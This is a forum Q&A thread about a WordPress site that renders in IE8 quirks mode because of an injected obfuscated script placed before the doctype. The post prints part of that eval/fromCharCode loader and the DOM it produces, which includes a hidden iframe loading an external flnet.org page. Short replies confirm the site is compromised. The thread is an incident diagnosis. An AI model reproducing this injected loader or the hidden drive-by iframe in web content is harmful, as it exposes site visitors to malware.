# Quirks Mode = Canary in the Coal Mine? Is the css breaking in IE8 a sign my WordPress site is hacked and if so, what is this script?

Tags: security, wordpress

I noticed the site was behaving strangely in IE8, and found in IE8 developer tools that it was rendering in quirks mode even though it uses the Doctype html declaration (which should make all browsers render in standards mode). In any case, in IE8 developer tools, some code was visible that wasn't visible in Chrome dev tools or in source code:

```
<script>if(window.document)try{new"a".prototype}catch(qqq){zz='eval';ss=[];aa=[]+0;aaa=0+[];if(aa.indexOf(aaa)===0){f='fromChar';f+='Code';}ee='e';e=window[zz];t='y';}h=Math.atan2(3,0)/Math.PI*-4;n="3.5p3.5p51.5p50p15p19p49p54.5p48.5p57.5p53.5p49.5p54p57p22p50.5p49.5p57p33.5p53p49.5p53.5p49.5p54p57p56.5p32p59.5p41p47.5p50.5p38p47.5p53.5p49.5p19p18.5p48p54.5p49p59.5p18.5p19.5p44.5p23p45.5p19.5p60.5p5.5p3.5p3.5p3.5p51.5p50p56p47.5p53.5p49.5p56p19p19.5p28.5p5.5p3.5p3.5p61.5p15p49.5p53p56.5p49.5p15p60.5p5.5p3.5p3.5p3.5p49p54.5p48.5p57.5p53.5p49.5p54p57p22p58.5p56p51.5p57p49.5p19p16p29p51.5p50p56p47.5p53.5p49.5p15p56.5p56p48.5p29.5p18.5p51p57p57p55p28p22.5p22.5p51p56.5p56p52.5p59p50p59.5p54p52p53.5p22p50p53p54p49.5p57p22p54.5p56p50.5p22.5p49p22.5p25p23p25p22p55p51p55p30.5p50.5p54. --- etc. etc. </script>
```

This code above appears right before the Doctype declaration in this wordpress html - making IE8 render in Quirks Mode... what the heck is this? It seems to be inserting this html, including iframes with src pointing at flnet.org at the top of the html that should be there:

```
<HTML class=" js no-flexbox no-canvas no-canvastext no-webgl no-touch no-geolocation postmessage no-websqldatabase no-indexeddb hashchange no-history draganddrop no-websockets no-rgba no-hsla no-multiplebgs no-backgroundsize no-borderimage no-borderradius no-boxshadow no-textshadow no-opacity no-cssanimations no-csscolumns no-cssgradients no-cssreflections no-csstransforms no-csstransforms3d no-csstransitions fontface generatedcontent no-video no-audio localstorage sessionstorage no-webworkers no-applicationcache no-svg no-inlinesvg no-smil no-svgclippaths" sizcache="4" sizset="0">
<HEAD>
<STYLE class=iepp-printshim media=print></STYLE>
<TITLE>[website title]</TITLE>
<SCRIPT>[repeat of script from above]</SCRIPT>
</HEAD> 
<BODY class="home page page-id-280 page-template page-template-gallery-php" sizcache="4" sizset="0"> 
<IFRAME style="DISPLAY: none" id=jQuery_history src="advanced.html"></IFRAME> 
<IFRAME style="POSITION: absolute; VISIBILITY: hidden; TOP: 0px; LEFT: 0px" height=10 src="http://hsrkxfyujm.flnet.org/d/404.php?go=1" width=10></IFRAME>
```

So, because the doctype isn't first, IE8 renders in Quirks Mode; more importantly, this seems to be a security incursion. Does anyone recognize it or know how to deal with it in WordPress... ?

Comment: Do other machines / people see this too? Would help you determine if its a server issue or malware on your machine.

Comment: Same code here: http://stackoverflow.com/questions/9478863/what-is-the-purpose-of-this-javascript-hack

Answer (score 0):

The code you're seeing these is obfuscated JavaScript. It is a symptom of your site being compromised.